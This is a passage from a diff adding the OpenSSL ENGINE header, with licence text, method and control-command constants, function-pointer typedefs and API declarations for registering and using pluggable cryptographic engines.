+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * ECDH support in OpenSSL originally developed by
+ * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
+ */
+
+#ifndef HEADER_ENGINE_H
+# define HEADER_ENGINE_H
+
+# include <openssl/opensslconf.h>
+
+# ifdef OPENSSL_NO_ENGINE
+#  error ENGINE is disabled.
+# endif
+
+# ifndef OPENSSL_NO_DEPRECATED
+#  include <openssl/bn.h>
+#  ifndef OPENSSL_NO_RSA
+#   include <openssl/rsa.h>
+#  endif
+#  ifndef OPENSSL_NO_DSA
+#   include <openssl/dsa.h>
+#  endif
+#  ifndef OPENSSL_NO_DH
+#   include <openssl/dh.h>
+#  endif
+#  ifndef OPENSSL_NO_ECDH
+#   include <openssl/ecdh.h>
+#  endif
+#  ifndef OPENSSL_NO_ECDSA
+#   include <openssl/ecdsa.h>
+#  endif
+#  include <openssl/rand.h>
+#  include <openssl/ui.h>
+#  include <openssl/err.h>
+# endif
+
+# include <openssl/ossl_typ.h>
+# include <openssl/symhacks.h>
+
+# include <openssl/x509.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/*
+ * These flags are used to control combinations of algorithm (methods) by
+ * bitwise "OR"ing.
+ */
+# define ENGINE_METHOD_RSA               (unsigned int)0x0001
+# define ENGINE_METHOD_DSA               (unsigned int)0x0002
+# define ENGINE_METHOD_DH                (unsigned int)0x0004
+# define ENGINE_METHOD_RAND              (unsigned int)0x0008
+# define ENGINE_METHOD_ECDH              (unsigned int)0x0010
+# define ENGINE_METHOD_ECDSA             (unsigned int)0x0020
+# define ENGINE_METHOD_CIPHERS           (unsigned int)0x0040
+# define ENGINE_METHOD_DIGESTS           (unsigned int)0x0080
+# define ENGINE_METHOD_STORE             (unsigned int)0x0100
+# define ENGINE_METHOD_PKEY_METHS        (unsigned int)0x0200
+# define ENGINE_METHOD_PKEY_ASN1_METHS   (unsigned int)0x0400
+/* Obvious all-or-nothing cases. */
+# define ENGINE_METHOD_ALL               (unsigned int)0xFFFF
+# define ENGINE_METHOD_NONE              (unsigned int)0x0000
+
+/*
+ * This(ese) flag(s) controls behaviour of the ENGINE_TABLE mechanism used
+ * internally to control registration of ENGINE implementations, and can be
+ * set by ENGINE_set_table_flags(). The "NOINIT" flag prevents attempts to
+ * initialise registered ENGINEs if they are not already initialised.
+ */
+# define ENGINE_TABLE_FLAG_NOINIT        (unsigned int)0x0001
+
+/* ENGINE flags that can be set by ENGINE_set_flags(). */
+/* Not used */
+/* #define ENGINE_FLAGS_MALLOCED        0x0001 */
+
+/*
+ * This flag is for ENGINEs that wish to handle the various 'CMD'-related
+ * control commands on their own. Without this flag, ENGINE_ctrl() handles
+ * these control commands on behalf of the ENGINE using their "cmd_defns"
+ * data.
+ */
+# define ENGINE_FLAGS_MANUAL_CMD_CTRL    (int)0x0002
+
+/*
+ * This flag is for ENGINEs who return new duplicate structures when found
+ * via "ENGINE_by_id()". When an ENGINE must store state (eg. if
+ * ENGINE_ctrl() commands are called in sequence as part of some stateful
+ * process like key-generation setup and execution), it can set this flag -
+ * then each attempt to obtain the ENGINE will result in it being copied into
+ * a new structure. Normally, ENGINEs don't declare this flag so
+ * ENGINE_by_id() just increments the existing ENGINE's structural reference
+ * count.
+ */
+# define ENGINE_FLAGS_BY_ID_COPY         (int)0x0004
+
+/*
+ * This flag if for an ENGINE that does not want its methods registered as
+ * part of ENGINE_register_all_complete() for example if the methods are not
+ * usable as default methods.
+ */
+
+# define ENGINE_FLAGS_NO_REGISTER_ALL    (int)0x0008
+
+/*
+ * ENGINEs can support their own command types, and these flags are used in
+ * ENGINE_CTRL_GET_CMD_FLAGS to indicate to the caller what kind of input
+ * each command expects. Currently only numeric and string input is
+ * supported. If a control command supports none of the _NUMERIC, _STRING, or
+ * _NO_INPUT options, then it is regarded as an "internal" control command -
+ * and not for use in config setting situations. As such, they're not
+ * available to the ENGINE_ctrl_cmd_string() function, only raw ENGINE_ctrl()
+ * access. Changes to this list of 'command types' should be reflected
+ * carefully in ENGINE_cmd_is_executable() and ENGINE_ctrl_cmd_string().
+ */
+
+/* accepts a 'long' input value (3rd parameter to ENGINE_ctrl) */
+# define ENGINE_CMD_FLAG_NUMERIC         (unsigned int)0x0001
+/*
+ * accepts string input (cast from 'void*' to 'const char *', 4th parameter
+ * to ENGINE_ctrl)
+ */
+# define ENGINE_CMD_FLAG_STRING          (unsigned int)0x0002
+/*
+ * Indicates that the control command takes *no* input. Ie. the control
+ * command is unparameterised.
+ */
+# define ENGINE_CMD_FLAG_NO_INPUT        (unsigned int)0x0004
+/*
+ * Indicates that the control command is internal. This control command won't
+ * be shown in any output, and is only usable through the ENGINE_ctrl_cmd()
+ * function.
+ */
+# define ENGINE_CMD_FLAG_INTERNAL        (unsigned int)0x0008
+
+/*
+ * NB: These 3 control commands are deprecated and should not be used.
+ * ENGINEs relying on these commands should compile conditional support for
+ * compatibility (eg. if these symbols are defined) but should also migrate
+ * the same functionality to their own ENGINE-specific control functions that
+ * can be "discovered" by calling applications. The fact these control
+ * commands wouldn't be "executable" (ie. usable by text-based config)
+ * doesn't change the fact that application code can find and use them
+ * without requiring per-ENGINE hacking.
+ */
+
+/*
+ * These flags are used to tell the ctrl function what should be done. All
+ * command numbers are shared between all engines, even if some don't make
+ * sense to some engines.  In such a case, they do nothing but return the
+ * error ENGINE_R_CTRL_COMMAND_NOT_IMPLEMENTED.
+ */
+# define ENGINE_CTRL_SET_LOGSTREAM               1
+# define ENGINE_CTRL_SET_PASSWORD_CALLBACK       2
+# define ENGINE_CTRL_HUP                         3/* Close and reinitialise
+                                                   * any handles/connections
+                                                   * etc. */
+# define ENGINE_CTRL_SET_USER_INTERFACE          4/* Alternative to callback */
+# define ENGINE_CTRL_SET_CALLBACK_DATA           5/* User-specific data, used
+                                                   * when calling the password
+                                                   * callback and the user
+                                                   * interface */
+# define ENGINE_CTRL_LOAD_CONFIGURATION          6/* Load a configuration,
+                                                   * given a string that
+                                                   * represents a file name
+                                                   * or so */
+# define ENGINE_CTRL_LOAD_SECTION                7/* Load data from a given
+                                                   * section in the already
+                                                   * loaded configuration */
+
+/*
+ * These control commands allow an application to deal with an arbitrary
+ * engine in a dynamic way. Warn: Negative return values indicate errors FOR
+ * THESE COMMANDS because zero is used to indicate 'end-of-list'. Other
+ * commands, including ENGINE-specific command types, return zero for an
+ * error. An ENGINE can choose to implement these ctrl functions, and can
+ * internally manage things however it chooses - it does so by setting the
+ * ENGINE_FLAGS_MANUAL_CMD_CTRL flag (using ENGINE_set_flags()). Otherwise
+ * the ENGINE_ctrl() code handles this on the ENGINE's behalf using the
+ * cmd_defns data (set using ENGINE_set_cmd_defns()). This means an ENGINE's
+ * ctrl() handler need only implement its own commands - the above "meta"
+ * commands will be taken care of.
+ */
+
+/*
+ * Returns non-zero if the supplied ENGINE has a ctrl() handler. If "not",
+ * then all the remaining control commands will return failure, so it is
+ * worth checking this first if the caller is trying to "discover" the
+ * engine's capabilities and doesn't want errors generated unnecessarily.
+ */
+# define ENGINE_CTRL_HAS_CTRL_FUNCTION           10
+/*
+ * Returns a positive command number for the first command supported by the
+ * engine. Returns zero if no ctrl commands are supported.
+ */
+# define ENGINE_CTRL_GET_FIRST_CMD_TYPE          11
+/*
+ * The 'long' argument specifies a command implemented by the engine, and the
+ * return value is the next command supported, or zero if there are no more.
+ */
+# define ENGINE_CTRL_GET_NEXT_CMD_TYPE           12
+/*
+ * The 'void*' argument is a command name (cast from 'const char *'), and the
+ * return value is the command that corresponds to it.
+ */
+# define ENGINE_CTRL_GET_CMD_FROM_NAME           13
+/*
+ * The next two allow a command to be converted into its corresponding string
+ * form. In each case, the 'long' argument supplies the command. In the
+ * NAME_LEN case, the return value is the length of the command name (not
+ * counting a trailing EOL). In the NAME case, the 'void*' argument must be a
+ * string buffer large enough, and it will be populated with the name of the
+ * command (WITH a trailing EOL).
+ */
+# define ENGINE_CTRL_GET_NAME_LEN_FROM_CMD       14
+# define ENGINE_CTRL_GET_NAME_FROM_CMD           15
+/* The next two are similar but give a "short description" of a command. */
+# define ENGINE_CTRL_GET_DESC_LEN_FROM_CMD       16
+# define ENGINE_CTRL_GET_DESC_FROM_CMD           17
+/*
+ * With this command, the return value is the OR'd combination of
+ * ENGINE_CMD_FLAG_*** values that indicate what kind of input a given
+ * engine-specific ctrl command expects.
+ */
+# define ENGINE_CTRL_GET_CMD_FLAGS               18
+
+/*
+ * ENGINE implementations should start the numbering of their own control
+ * commands from this value. (ie. ENGINE_CMD_BASE, ENGINE_CMD_BASE + 1, etc).
+ */
+# define ENGINE_CMD_BASE                         200
+
+/*
+ * NB: These 2 nCipher "chil" control commands are deprecated, and their
+ * functionality is now available through ENGINE-specific control commands
+ * (exposed through the above-mentioned 'CMD'-handling). Code using these 2
+ * commands should be migrated to the more general command handling before
+ * these are removed.
+ */
+
+/* Flags specific to the nCipher "chil" engine */
+# define ENGINE_CTRL_CHIL_SET_FORKCHECK          100
+        /*
+         * Depending on the value of the (long)i argument, this sets or
+         * unsets the SimpleForkCheck flag in the CHIL API to enable or
+         * disable checking and workarounds for applications that fork().
+         */
+# define ENGINE_CTRL_CHIL_NO_LOCKING             101
+        /*
+         * This prevents the initialisation function from providing mutex
+         * callbacks to the nCipher library.
+         */
+
+/*
+ * If an ENGINE supports its own specific control commands and wishes the
+ * framework to handle the above 'ENGINE_CMD_***'-manipulation commands on
+ * its behalf, it should supply a null-terminated array of ENGINE_CMD_DEFN
+ * entries to ENGINE_set_cmd_defns(). It should also implement a ctrl()
+ * handler that supports the stated commands (ie. the "cmd_num" entries as
+ * described by the array). NB: The array must be ordered in increasing order
+ * of cmd_num. "null-terminated" means that the last ENGINE_CMD_DEFN element
+ * has cmd_num set to zero and/or cmd_name set to NULL.
+ */
+typedef struct ENGINE_CMD_DEFN_st {
+    unsigned int cmd_num;       /* The command number */
+    const char *cmd_name;       /* The command name itself */
+    const char *cmd_desc;       /* A short description of the command */
+    unsigned int cmd_flags;     /* The input the command expects */
+} ENGINE_CMD_DEFN;
+
+/* Generic function pointer */
+typedef int (*ENGINE_GEN_FUNC_PTR) (void);
+/* Generic function pointer taking no arguments */
+typedef int (*ENGINE_GEN_INT_FUNC_PTR) (ENGINE *);
+/* Specific control function pointer */
+typedef int (*ENGINE_CTRL_FUNC_PTR) (ENGINE *, int, long, void *,
+                                     void (*f) (void));
+/* Generic load_key function pointer */
+typedef EVP_PKEY *(*ENGINE_LOAD_KEY_PTR)(ENGINE *, const char *,
+                                         UI_METHOD *ui_method,
+                                         void *callback_data);
+typedef int (*ENGINE_SSL_CLIENT_CERT_PTR) (ENGINE *, SSL *ssl,
+                                           STACK_OF(X509_NAME) *ca_dn,
+                                           X509 **pcert, EVP_PKEY **pkey,
+                                           STACK_OF(X509) **pother,
+                                           UI_METHOD *ui_method,
+                                           void *callback_data);
+/*-
+ * These callback types are for an ENGINE's handler for cipher and digest logic.
+ * These handlers have these prototypes;
+ *   int foo(ENGINE *e, const EVP_CIPHER **cipher, const int **nids, int nid);
+ *   int foo(ENGINE *e, const EVP_MD **digest, const int **nids, int nid);
+ * Looking at how to implement these handlers in the case of cipher support, if
+ * the framework wants the EVP_CIPHER for 'nid', it will call;
+ *   foo(e, &p_evp_cipher, NULL, nid);    (return zero for failure)
+ * If the framework wants a list of supported 'nid's, it will call;
+ *   foo(e, NULL, &p_nids, 0); (returns number of 'nids' or -1 for error)
+ */
+/*
+ * Returns to a pointer to the array of supported cipher 'nid's. If the
+ * second parameter is non-NULL it is set to the size of the returned array.
+ */
+typedef int (*ENGINE_CIPHERS_PTR) (ENGINE *, const EVP_CIPHER **,
+                                   const int **, int);
+typedef int (*ENGINE_DIGESTS_PTR) (ENGINE *, const EVP_MD **, const int **,
+                                   int);
+typedef int (*ENGINE_PKEY_METHS_PTR) (ENGINE *, EVP_PKEY_METHOD **,
+                                      const int **, int);
+typedef int (*ENGINE_PKEY_ASN1_METHS_PTR) (ENGINE *, EVP_PKEY_ASN1_METHOD **,
+                                           const int **, int);
+/*
+ * STRUCTURE functions ... all of these functions deal with pointers to
+ * ENGINE structures where the pointers have a "structural reference". This
+ * means that their reference is to allowed access to the structure but it
+ * does not imply that the structure is functional. To simply increment or
+ * decrement the structural reference count, use ENGINE_by_id and
+ * ENGINE_free. NB: This is not required when iterating using ENGINE_get_next
+ * as it will automatically decrement the structural reference count of the
+ * "current" ENGINE and increment the structural reference count of the
+ * ENGINE it returns (unless it is NULL).
+ */
+
+/* Get the first/last "ENGINE" type available. */
+ENGINE *ENGINE_get_first(void);
+ENGINE *ENGINE_get_last(void);
+/* Iterate to the next/previous "ENGINE" type (NULL = end of the list). */
+ENGINE *ENGINE_get_next(ENGINE *e);
+ENGINE *ENGINE_get_prev(ENGINE *e);
+/* Add another "ENGINE" type into the array. */
+int ENGINE_add(ENGINE *e);
+/* Remove an existing "ENGINE" type from the array. */
+int ENGINE_remove(ENGINE *e);
+/* Retrieve an engine from the list by its unique "id" value. */
+ENGINE *ENGINE_by_id(const char *id);
+/* Add all the built-in engines. */
+void ENGINE_load_openssl(void);
+void ENGINE_load_dynamic(void);
+# ifndef OPENSSL_NO_STATIC_ENGINE
+void ENGINE_load_4758cca(void);
+void ENGINE_load_aep(void);
+void ENGINE_load_atalla(void);
+void ENGINE_load_chil(void);
+void ENGINE_load_cswift(void);
+void ENGINE_load_nuron(void);
+void ENGINE_load_sureware(void);
+void ENGINE_load_ubsec(void);
+void ENGINE_load_padlock(void);
+void ENGINE_load_capi(void);
+#  ifndef OPENSSL_NO_GMP
+void ENGINE_load_gmp(void);
+#  endif
+#  ifndef OPENSSL_NO_GOST
+void ENGINE_load_gost(void);
+#  endif
+# endif
+void ENGINE_load_cryptodev(void);
+void ENGINE_load_rdrand(void);
+void ENGINE_load_builtin_engines(void);
+
+/*
+ * Get and set global flags (ENGINE_TABLE_FLAG_***) for the implementation
+ * "registry" handling.
+ */
+unsigned int ENGINE_get_table_flags(void);
+void ENGINE_set_table_flags(unsigned int flags);
+
+/*- Manage registration of ENGINEs per "table". For each type, there are 3
+ * functions;
+ *   ENGINE_register_***(e) - registers the implementation from 'e' (if it has one)
+ *   ENGINE_unregister_***(e) - unregister the implementation from 'e'
+ *   ENGINE_register_all_***() - call ENGINE_register_***() for each 'e' in the list
+ * Cleanup is automatically registered from each table when required, so
+ * ENGINE_cleanup() will reverse any "register" operations.
+ */
+
+int ENGINE_register_RSA(ENGINE *e);
+void ENGINE_unregister_RSA(ENGINE *e);
+void ENGINE_register_all_RSA(void);
+
+int ENGINE_register_DSA(ENGINE *e);
+void ENGINE_unregister_DSA(ENGINE *e);
+void ENGINE_register_all_DSA(void);
+
+int ENGINE_register_ECDH(ENGINE *e);
+void ENGINE_unregister_ECDH(ENGINE *e);
+void ENGINE_register_all_ECDH(void);
+
+int ENGINE_register_ECDSA(ENGINE *e);
+void ENGINE_unregister_ECDSA(ENGINE *e);
+void ENGINE_register_all_ECDSA(void);
+
+int ENGINE_register_DH(ENGINE *e);
+void ENGINE_unregister_DH(ENGINE *e);
+void ENGINE_register_all_DH(void);
+
+int ENGINE_register_RAND(ENGINE *e);
+void ENGINE_unregister_RAND(ENGINE *e);
+void ENGINE_register_all_RAND(void);
+
+int ENGINE_register_STORE(ENGINE *e);
+void ENGINE_unregister_STORE(ENGINE *e);
+void ENGINE_register_all_STORE(void);
+
+int ENGINE_register_ciphers(ENGINE *e);
+void ENGINE_unregister_ciphers(ENGINE *e);
+void ENGINE_register_all_ciphers(void);
+
+int ENGINE_register_digests(ENGINE *e);
+void ENGINE_unregister_digests(ENGINE *e);
+void ENGINE_register_all_digests(void);
+
+int ENGINE_register_pkey_meths(ENGINE *e);
+void ENGINE_unregister_pkey_meths(ENGINE *e);
+void ENGINE_register_all_pkey_meths(void);
+
+int ENGINE_register_pkey_asn1_meths(ENGINE *e);
+void ENGINE_unregister_pkey_asn1_meths(ENGINE *e);
+void ENGINE_register_all_pkey_asn1_meths(void);
+
+/*
+ * These functions register all support from the above categories. Note, use
+ * of these functions can result in static linkage of code your application
+ * may not need. If you only need a subset of functionality, consider using
+ * more selective initialisation.
+ */
+int ENGINE_register_complete(ENGINE *e);
+int ENGINE_register_all_complete(void);
+
+/*
+ * Send parametrised control commands to the engine. The possibilities to
+ * send down an integer, a pointer to data or a function pointer are
+ * provided. Any of the parameters may or may not be NULL, depending on the
+ * command number. In actuality, this function only requires a structural
+ * (rather than functional) reference to an engine, but many control commands
+ * may require the engine be functional. The caller should be aware of trying
+ * commands that require an operational ENGINE, and only use functional
+ * references in such situations.
+ */
+int ENGINE_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) (void));
+
+/*
+ * This function tests if an ENGINE-specific command is usable as a
+ * "setting". Eg. in an application's config file that gets processed through
+ * ENGINE_ctrl_cmd_string(). If this returns zero, it is not available to
+ * ENGINE_ctrl_cmd_string(), only ENGINE_ctrl().
+ */
+int ENGINE_cmd_is_executable(ENGINE *e, int cmd);
+
+/*
+ * This function works like ENGINE_ctrl() with the exception of taking a
+ * command name instead of a command number, and can handle optional
+ * commands. See the comment on ENGINE_ctrl_cmd_string() for an explanation
+ * on how to use the cmd_name and cmd_optional.
+ */
+int ENGINE_ctrl_cmd(ENGINE *e, const char *cmd_name,
+                    long i, void *p, void (*f) (void), int cmd_optional);
+
+/*
+ * This function passes a command-name and argument to an ENGINE. The
+ * cmd_name is converted to a command number and the control command is
+ * called using 'arg' as an argument (unless the ENGINE doesn't support such
+ * a command, in which case no control command is called). The command is
+ * checked for input flags, and if necessary the argument will be converted
+ * to a numeric value. If cmd_optional is non-zero, then if the ENGINE
+ * doesn't support the given cmd_name the return value will be success
+ * anyway. This function is intended for applications to use so that users
+ * (or config files) can supply engine-specific config data to the ENGINE at
+ * run-time to control behaviour of specific engines. As such, it shouldn't
+ * be used for calling ENGINE_ctrl() functions that return data, deal with
+ * binary data, or that are otherwise supposed to be used directly through
+ * ENGINE_ctrl() in application code. Any "return" data from an ENGINE_ctrl()
+ * operation in this function will be lost - the return value is interpreted
+ * as failure if the return value is zero, success otherwise, and this
+ * function returns a boolean value as a result. In other words, vendors of
+ * 'ENGINE'-enabled devices should write ENGINE implementations with
+ * parameterisations that work in this scheme, so that compliant ENGINE-based
+ * applications can work consistently with the same configuration for the
+ * same ENGINE-enabled devices, across applications.
+ */
+int ENGINE_ctrl_cmd_string(ENGINE *e, const char *cmd_name, const char *arg,
+                           int cmd_optional);
+
+/*
+ * These functions are useful for manufacturing new ENGINE structures. They
+ * don't address reference counting at all - one uses them to populate an
+ * ENGINE structure with personalised implementations of things prior to
+ * using it directly or adding it to the builtin ENGINE list in OpenSSL.
+ * These are also here so that the ENGINE structure doesn't have to be
+ * exposed and break binary compatibility!
+ */
+ENGINE *ENGINE_new(void);
+int ENGINE_free(ENGINE *e);
+int ENGINE_up_ref(ENGINE *e);
+int ENGINE_set_id(ENGINE *e, const char *id);
+int ENGINE_set_name(ENGINE *e, const char *name);
+int ENGINE_set_RSA(ENGINE *e, const RSA_METHOD *rsa_meth);
+int ENGINE_set_DSA(ENGINE *e, const DSA_METHOD *dsa_meth);
+int ENGINE_set_ECDH(ENGINE *e, const ECDH_METHOD *ecdh_meth);
+int ENGINE_set_ECDSA(ENGINE *e, const ECDSA_METHOD *ecdsa_meth);
+int ENGINE_set_DH(ENGINE *e, const DH_METHOD *dh_meth);
+int ENGINE_set_RAND(ENGINE *e, const RAND_METHOD *rand_meth);
+int ENGINE_set_STORE(ENGINE *e, const STORE_METHOD *store_meth);
+int ENGINE_set_destroy_function(ENGINE *e, ENGINE_GEN_INT_FUNC_PTR destroy_f);
+int ENGINE_set_init_function(ENGINE *e, ENGINE_GEN_INT_FUNC_PTR init_f);
+int ENGINE_set_finish_function(ENGINE *e, ENGINE_GEN_INT_FUNC_PTR finish_f);
+int ENGINE_set_ctrl_function(ENGINE *e, ENGINE_CTRL_FUNC_PTR ctrl_f);
+int ENGINE_set_load_privkey_function(ENGINE *e,
+                                     ENGINE_LOAD_KEY_PTR loadpriv_f);
+int ENGINE_set_load_pubkey_function(ENGINE *e, ENGINE_LOAD_KEY_PTR loadpub_f);
+int ENGINE_set_load_ssl_client_cert_function(ENGINE *e,
+                                             ENGINE_SSL_CLIENT_CERT_PTR
+                                             loadssl_f);
+int ENGINE_set_ciphers(ENGINE *e, ENGINE_CIPHERS_PTR f);
+int ENGINE_set_digests(ENGINE *e, ENGINE_DIGESTS_PTR f);
+int ENGINE_set_pkey_meths(ENGINE *e, ENGINE_PKEY_METHS_PTR f);
+int ENGINE_set_pkey_asn1_meths(ENGINE *e, ENGINE_PKEY_ASN1_METHS_PTR f);
+int ENGINE_set_flags(ENGINE *e, int flags);
+int ENGINE_set_cmd_defns(ENGINE *e, const ENGINE_CMD_DEFN *defns);
+/* These functions allow control over any per-structure ENGINE data. */
+int ENGINE_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
+                            CRYPTO_EX_dup *dup_func,
+                            CRYPTO_EX_free *free_func);
+int ENGINE_set_ex_data(ENGINE *e, int idx, void *arg);
+void *ENGINE_get_ex_data(const ENGINE *e, int idx);
+
+/*
+ * This function cleans up anything that needs it. Eg. the ENGINE_add()
+ * function automatically ensures the list cleanup function is registered to
+ * be called from ENGINE_cleanup(). Similarly, all ENGINE_register_***
+ * functions ensure ENGINE_cleanup() will clean up after them.
+ */
+void ENGINE_cleanup(void);
+
+/*
+ * These return values from within the ENGINE structure. These can be useful
+ * with functional references as well as structural references - it depends
+ * which you obtained. Using the result for functional purposes if you only
+ * obtained a structural reference may be problematic!
+ */
+const char *ENGINE_get_id(const ENGINE *e);
+const char *ENGINE_get_name(const ENGINE *e);
+const RSA_METHOD *ENGINE_get_RSA(const ENGINE *e);
+const DSA_METHOD *ENGINE_get_DSA(const ENGINE *e);
+const ECDH_METHOD *ENGINE_get_ECDH(const ENGINE *e);
+const ECDSA_METHOD *ENGINE_get_ECDSA(const ENGINE *e);
+const DH_METHOD *ENGINE_get_DH(const ENGINE *e);
+const RAND_METHOD *ENGINE_get_RAND(const ENGINE *e);
+const STORE_METHOD *ENGINE_get_STORE(const ENGINE *e);
+ENGINE_GEN_INT_FUNC_PTR ENGINE_get_destroy_function(const ENGINE *e);
+ENGINE_GEN_INT_FUNC_PTR ENGINE_get_init_function(const ENGINE *e);
+ENGINE_GEN_INT_FUNC_PTR ENGINE_get_finish_function(const ENGINE *e);
+ENGINE_CTRL_FUNC_PTR ENGINE_get_ctrl_function(const ENGINE *e);
+ENGINE_LOAD_KEY_PTR ENGINE_get_load_privkey_function(const ENGINE *e);
+ENGINE_LOAD_KEY_PTR ENGINE_get_load_pubkey_function(const ENGINE *e);
+ENGINE_SSL_CLIENT_CERT_PTR ENGINE_get_ssl_client_cert_function(const ENGINE
+                                                               *e);
+ENGINE_CIPHERS_PTR ENGINE_get_ciphers(const ENGINE *e);
+ENGINE_DIGESTS_PTR ENGINE_get_digests(const ENGINE *e);
+ENGINE_PKEY_METHS_PTR ENGINE_get_pkey_meths(const ENGINE *e);
+ENGINE_PKEY_ASN1_METHS_PTR ENGINE_get_pkey_asn1_meths(const ENGINE *e);
+const EVP_CIPHER *ENGINE_get_cipher(ENGINE *e, int nid);
+const EVP_MD *ENGINE_get_digest(ENGINE *e, int nid);
+const EVP_PKEY_METHOD *ENGINE_get_pkey_meth(ENGINE *e, int nid);
+const EVP_PKEY_ASN1_METHOD *ENGINE_get_pkey_asn1_meth(ENGINE *e, int nid);
+const EVP_PKEY_ASN1_METHOD *ENGINE_get_pkey_asn1_meth_str(ENGINE *e,
+                                                          const char *str,
+                                                          int len);
+const EVP_PKEY_ASN1_METHOD *ENGINE_pkey_asn1_find_str(ENGINE **pe,
+                                                      const char *str,
+                                                      int len);
+const ENGINE_CMD_DEFN *ENGINE_get_cmd_defns(const ENGINE *e);
+int ENGINE_get_flags(const ENGINE *e);
+
+/*
+ * FUNCTIONAL functions. These functions deal with ENGINE structures that
+ * have (or will) be initialised for use. Broadly speaking, the structural
+ * functions are useful for iterating the list of available engine types,
+ * creating new engine types, and other "list" operations. These functions
+ * actually deal with ENGINEs that are to be used. As such these functions
+ * can fail (if applicable) when particular engines are unavailable - eg. if
+ * a hardware accelerator is not attached or not functioning correctly. Each
+ * ENGINE has 2 reference counts; structural and functional. Every time a
+ * functional reference is obtained or released, a corresponding structural
+ * reference is automatically obtained or released too.
+ */
+
+/*
+ * Initialise a engine type for use (or up its reference count if it's
+ * already in use). This will fail if the engine is not currently operational
+ * and cannot initialise.
+ */
+int ENGINE_init(ENGINE *e);
+/*
+ * Free a functional reference to a engine type. This does not require a
+ * corresponding call to ENGINE_free as it also releases a structural
+ * reference.
+ */
+int ENGINE_finish(ENGINE *e);
+
+/*
+ * The following functions handle keys that are stored in some secondary
+ * location, handled by the engine.  The storage may be on a card or
+ * whatever.
+ */
+EVP_PKEY *ENGINE_load_private_key(ENGINE *e, const char *key_id,
+                                  UI_METHOD *ui_method, void *callback_data);
+EVP_PKEY *ENGINE_load_public_key(ENGINE *e, const char *key_id,
+                                 UI_METHOD *ui_method, void *callback_data);
+int ENGINE_load_ssl_client_cert(ENGINE *e, SSL *s,
+                                STACK_OF(X509_NAME) *ca_dn, X509 **pcert,
+                                EVP_PKEY **ppkey, STACK_OF(X509) **pother,
+                                UI_METHOD *ui_method, void *callback_data);
+
+/*
+ * This returns a pointer for the current ENGINE structure that is (by
+ * default) performing any RSA operations. The value returned is an
+ * incremented reference, so it should be free'd (ENGINE_finish) before it is
+ * discarded.
+ */
+ENGINE *ENGINE_get_default_RSA(void);
+/* Same for the other "methods" */
+ENGINE *ENGINE_get_default_DSA(void);
+ENGINE *ENGINE_get_default_ECDH(void);
+ENGINE *ENGINE_get_default_ECDSA(void);
+ENGINE *ENGINE_get_default_DH(void);
+ENGINE *ENGINE_get_default_RAND(void);
+/*
+ * These functions can be used to get a functional reference to perform
+ * ciphering or digesting corresponding to "nid".
+ */
+ENGINE *ENGINE_get_cipher_engine(int nid);
+ENGINE *ENGINE_get_digest_engine(int nid);
+ENGINE *ENGINE_get_pkey_meth_engine(int nid);
+ENGINE *ENGINE_get_pkey_asn1_meth_engine(int nid);
+
+/*
+ * This sets a new default ENGINE structure for performing RSA operations. If
+ * the result is non-zero (success) then the ENGINE structure will have had
+ * its reference count up'd so the caller should still free their own
+ * reference 'e'.
+ */
+int ENGINE_set_default_RSA(ENGINE *e);
+int ENGINE_set_default_string(ENGINE *e, const char *def_list);
+/* Same for the other "methods" */
+int ENGINE_set_default_DSA(ENGINE *e);
+int ENGINE_set_default_ECDH(ENGINE *e);
+int ENGINE_set_default_ECDSA(ENGINE *e);
+int ENGINE_set_default_DH(ENGINE *e);
+int ENGINE_set_default_RAND(ENGINE *e);
+int ENGINE_set_default_ciphers(ENGINE *e);
+int ENGINE_set_default_digests(ENGINE *e);
+int ENGINE_set_default_pkey_meths(ENGINE *e);
+int ENGINE_set_default_pkey_asn1_meths(ENGINE *e);
+
+/*
+ * The combination "set" - the flags are bitwise "OR"d from the
+ * ENGINE_METHOD_*** defines above. As with the "ENGINE_register_complete()"
+ * function, this function can result in unnecessary static linkage. If your
+ * application requires only specific functionality, consider using more
+ * selective functions.
+ */
+int ENGINE_set_default(ENGINE *e, unsigned int flags);
+
+void ENGINE_add_conf_module(void);
+
+/* Deprecated functions ... */
+/* int ENGINE_clear_defaults(void); */
+
+/**************************/
+/* DYNAMIC ENGINE SUPPORT */
+/**************************/
+
+/* Binary/behaviour compatibility levels */
+# define OSSL_DYNAMIC_VERSION            (unsigned long)0x00020000
+/*
+ * Binary versions older than this are too old for us (whether we're a loader
+ * or a loadee)
+ */
+# define OSSL_DYNAMIC_OLDEST             (unsigned long)0x00020000
+
+/*
+ * When compiling an ENGINE entirely as an external shared library, loadable
